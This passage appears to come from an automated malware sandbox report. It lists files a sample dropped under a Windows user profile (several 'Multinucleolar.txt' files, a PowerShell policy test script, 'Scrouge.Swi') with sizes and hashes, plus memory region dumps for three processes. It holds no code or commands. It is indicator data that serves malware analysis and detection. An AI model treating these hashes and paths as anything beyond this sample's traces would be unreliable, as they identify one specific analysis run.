          bc3e355cd36ab9aa43c6156836250ad6d9217aebf7585a11057d462d11d0e1c2c0c4231f1bfaec58baffd6015a9a525d4b1f9cf39aea780ce2c34f69d700e6b4

        • C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt

          Filesize

          1KB

          MD5

          6d3b3d25a64ba16d9f84e9189c0dd54c

          SHA1

          69f62e418510c9bb03d61a57b17b622ae1a58483

          SHA256

          7d69df7791ff9c20418aaf939d3caee005bcb34278e86f34a4bbb683e206a476

          SHA512

          30752727930d0cc6754b0c234e8ab12f44401527b06b749f8f901b211f8a140f0cd49a9baaabcb61d230ced62df02c49b5075c6dc7c6cc0ec5523203e82709bb

        • C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt

          Filesize

          2KB

          MD5

          5fa80a0193e7241a3f1a1792965389a4

          SHA1

          244daa82a2298b181bfbcdf3c13915ea96dfafcb

          SHA256

          65a0b8d41a62b343fc2bae360e439fd1a5d8beeff3d8a5113ead8fa70bb18828

          SHA512

          7c156d2e9ebdd32b4bdaf996dc457a8e7507863fa9b3101537053f83849d34e3335b6e86887822bdfb254eb8a79ed860955c2f5a32b994ed90f3b9742959f461

        • C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt

          Filesize

          2KB

          MD5

          76afd47a058f64a36fd3fc3fa8d42861

          SHA1

          89f3de4e12c7a21460321403a06369bf4353215b

          SHA256

          7737a78095f3719c5b04bc0e7ad43e9ce4ccc81a6bfb0e19805e3e4c30937285

          SHA512

          8866d01464f31db85beb445eabf98df3a73ba8260bafd5c35b1d2c1855a835b144da8ea778b434bcb28c3d43e9339922e982a093eabd9b72e985b90e350a4f1c

        • C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt

          Filesize

          3KB

          MD5

          ef9b0d1f2b2713b683d77493108a6f08

          SHA1

          124933eb36c8e39dce55581347c7a23cc4fafe3a

          SHA256

          2731f761a38af729ab2184c73aa59507665308b3fd7e8b05090e6c2678283c8f

          SHA512

          9c653ff7debc32f416a21cc55f9dcb9a342af87b4c1c7b9464ac7f2813bd55fa58f0dff6c79806b2c7f7ec796279b74037d2107cacaf1ef4eb1f07fee6d73d75

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kumzcvv2.0vw.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Roaming\Scrouge.Swi

          Filesize

          494KB

          MD5

          be60fe46432e08e827aeefd9f72d5790

          SHA1

          7322ebc77810e84976136174258dddde78a23f27

          SHA256

          8722cb6fe1e75ddcd9127b92f438e2b0155eab29cc29270ca7aa35be9edff7b4

          SHA512

          72a7e93c1c1d78260ec1ac1438450baf4d6f21a1299824878e405a115c8318796d7bf233db80d42f8d66ab1c73531741965fbf1e9679a1fb2071bab9d8b9e913

        • memory/2992-393-0x0000000025970000-0x000000002597A000-memory.dmp

          Filesize

          40KB

        • memory/2992-392-0x0000000025FF0000-0x0000000026082000-memory.dmp

          Filesize

          584KB

        • memory/2992-391-0x0000000025920000-0x0000000025970000-memory.dmp

          Filesize

          320KB

        • memory/2992-386-0x0000000000FF0000-0x0000000001032000-memory.dmp

          Filesize

          264KB

        • memory/2992-384-0x0000000000FF0000-0x0000000002244000-memory.dmp

          Filesize

          18.3MB

        • memory/3632-345-0x0000000006160000-0x00000000061C6000-memory.dmp

          Filesize

          408KB

        • memory/3632-371-0x0000000075310000-0x0000000075AC0000-memory.dmp

          Filesize

          7.7MB

        • memory/3632-341-0x0000000075310000-0x0000000075AC0000-memory.dmp

          Filesize

          7.7MB

        • memory/3632-342-0x00000000059B0000-0x0000000005FD8000-memory.dmp

          Filesize

          6.2MB

        • memory/3632-343-0x0000000005800000-0x0000000005822000-memory.dmp

          Filesize

          136KB

        • memory/3632-344-0x0000000005FE0000-0x0000000006046000-memory.dmp

          Filesize

          408KB

        • memory/3632-339-0x00000000051E0000-0x0000000005216000-memory.dmp

          Filesize

          216KB

        • memory/3632-351-0x00000000061D0000-0x0000000006524000-memory.dmp

          Filesize

          3.3MB

        • memory/3632-385-0x0000000075310000-0x0000000075AC0000-memory.dmp

          Filesize

          7.7MB

        • memory/3632-340-0x0000000075310000-0x0000000075AC0000-memory.dmp

          Filesize

          7.7MB

        • memory/3632-358-0x0000000006700000-0x000000000671E000-memory.dmp

          Filesize

          120KB

        • memory/3632-359-0x00000000067D0000-0x000000000681C000-memory.dmp

          Filesize

          304KB

        • memory/3632-369-0x0000000008E50000-0x000000000EAA9000-memory.dmp

          Filesize

          92.3MB

        • memory/3632-361-0x0000000008220000-0x000000000889A000-memory.dmp

          Filesize

          6.5MB

        • memory/3632-362-0x0000000006B90000-0x0000000006BAA000-memory.dmp

          Filesize

          104KB

        • memory/3632-363-0x0000000007BA0000-0x0000000007C36000-memory.dmp

          Filesize

          600KB

        • memory/3632-364-0x00000000078B0000-0x00000000078D2000-memory.dmp

          Filesize

          136KB

        • memory/3632-365-0x00000000088A0000-0x0000000008E44000-memory.dmp

          Filesize

          5.6MB

        • memory/3632-338-0x000000007531E000-0x000000007531F000-memory.dmp

          Filesize

          4KB

        • memory/3632-367-0x000000007531E000-0x000000007531F000-memory.dmp

          Filesize

          4KB

        • memory/3632-368-0x0000000075310000-0x0000000075AC0000-memory.dmp

          Filesize

          7.7MB

        • memory/4612-360-0x00007FFD774B0000-0x00007FFD77F71000-memory.dmp

          Filesize

          10.8MB

        • memory/4612-357-0x00007FFD774B0000-0x00007FFD77F71000-memory.dmp

          Filesize

          10.8MB

        • memory/4612-356-0x00007FFD774B3000-0x00007FFD774B5000-memory.dmp

          Filesize

          8KB

        • memory/4612-335-0x00007FFD774B0000-0x00007FFD77F71000-memory.dmp

          Filesize

          10.8MB

        • memory/4612-334-0x00007FFD774B0000-0x00007FFD77F71000-memory.dmp

          Filesize

          10.8MB

        • memory/4612-389-0x00007FFD774B0000-0x00007FFD77F71000-memory.dmp

          Filesize

          10.8MB

        • memory/4612-333-0x00007FFD774B0000-0x00007FFD77F71000-memory.dmp

          Filesize

          10.8MB

        • memory/4612-323-0x0000020054C00000-0x0000020054C22000-memory.dmp

          Filesize

          136KB

        • memory/4612-322-0x00007FFD774B3000-0x00007FFD774B5000-memory.dmp

          Filesize

          8KB